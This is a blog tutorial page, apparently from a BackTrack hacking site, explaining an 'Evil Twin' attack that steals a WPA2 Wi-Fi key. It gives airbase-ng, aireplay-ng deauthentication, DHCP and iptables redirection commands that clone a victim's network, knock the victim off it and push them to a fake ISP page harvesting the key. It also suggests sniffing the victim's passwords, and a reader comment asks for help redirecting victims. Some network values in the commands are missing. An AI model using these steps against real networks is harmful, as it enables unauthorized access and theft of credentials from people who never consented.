Saturday, 2018-11-17, 10:56 PM
Welcome Guest | RSS

Total online: 1
Guests: 1
Users: 0
Site menu
Our Documentations
Blog Category
# Only for beginners [39]
This category contains some introductions and tutorials about UBUNTU and BACKTRACK for those who just start using LINUX.
# Computer Security [11]
In this category, you will find all courses about the Informatique Security
# LINUX [2]
# BackTrack 5 Tutorials [6]
In this categorie, I will post all tutorials about BackTrack5 (Installation, Configuration, Update, Hacking...)
# TechnicDynamic Tutorials [12]
Technic Dynamic is a source of education focused in the following categories of technology: (Computer - Design - Gadgets - Networking - Security) Link :
# Vishnuvalentino Tutorials [2]
He is a computer security specialist, and also freelance website designer. Read more :
# Hackers News [6]
All news about the hackers of the world ...
# Tools [18]
All Security Tools
Entries archive

Follow us
Main » 2012 » January » 27 » Third Tutorial : Hacking WPA 2 Key – Evil Twin (No Bruteforce)
10:51 PM
Third Tutorial : Hacking WPA 2 Key – Evil Twin (No Bruteforce)

Hacking WPA 2 Key – Evil Twin (No Bruteforce)

In an ealier post, we’ve seen how to crack WPA-2 network keys using a dictionary.


While that technique works, it could take an awful long time, especially when brute forcing.


On this technique, named ‘Evil Twin’, we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point – which looks exactly like his. :)

When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.


For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called ‘wpa2′, which can be done with the following commands:


Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database:

create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));


Finally, start apache and mysql services and check everything works, by going typing localhost on a web-browser.


Click here to download the files: [ DOWNLOAD ]


Check out the video:



Install dhcp3 and create config file:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;

Start clone access point:
airmon-ng start wlan0 [channel]
airbase-ng -e "AP name" -c [channel] -a mon0
ifconfig at0 up
ifconfig at0 netmask
route add -net netmask gw
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/ at0
/etc/init.d/dhcp3-server start

Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):
aireplay-ng -0 0 -a [target bssid] [monitor interface]

DeAuthenticate Client (recommended):
aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]

Category: # BackTrack 5 Tutorials | Views: 3486 | Added by: Administrator | Tags: wireless | Rating: 5.0/1
Total comments: 2
0 Spam
2 donjuandemarco  

thank you very much for this great work, it is very well explained, I followed with a letter and I could make progress but incomplete because I have not been able to do the redirection to my websites fake html page only if I type in address bar I get my fake html page.

and often I find difficult to connect to my network false??

for information, I has a 3g usb stick with a flow rate of 236kbits with I logged on backtrack.
and wireless card alfa AWUS036H with I crack.

please clarify me how to get the wrong html page and will forward all websites.

thank you

0 Spam
1 road runner  
hey sir .... download link is down :(

Name *:
Email *:
Code *:

Share This On:
Google Translator
Login form
Our poll
Rate my site
Total of answers: 17
Clock & Calendar

«  January 2012  »